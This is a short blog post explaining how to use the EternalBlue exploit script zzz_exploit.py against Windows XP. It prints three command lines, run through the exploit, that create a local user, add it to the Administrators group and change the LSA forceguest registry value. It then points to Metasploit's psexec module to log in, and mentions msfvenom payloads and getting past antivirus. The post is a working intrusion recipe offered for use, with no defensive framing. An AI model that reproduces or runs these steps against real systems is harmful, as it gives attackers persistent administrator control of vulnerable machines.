EternalBlue on Windows XP

Mike

Apr 24, 2018 • 1 min read

There's a few articles and exploits out there where EternalBlue has been found to work on Windows XP. However, the metasploit framework does not seem to have a reliable exploit for it.

I did find a working exploit here, specifically zzz_exploit.py works perfect. However, it basically just writes an empty file (around line 975). You can use this to run arbitrary commands though. So create an exploit with msfvenom, spin up a webserver, have it downloaded, hope AV doesn't catch it... or, lets just take the easy road.

service_exec(conn, r'cmd /c net user <username> <password> /add')
service_exec(conn, r'cmd /c net localgroup Administrators <username> /add')
service_exec(conn, r'reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f')

These three lines create a user, add the user to the Administrators group, and then (perhaps most importantly) sets the registry value for secpol.msc -> Local Policies -> Security Options -> "Network access: Sharing and security model for local accounts". It sets this value to 0 which corresponds to "Classic - local users authenticate as themselves".

Once the user is added and the value set, use exploit/windows/smb/psexec and authenticate!

Sign up for more like this.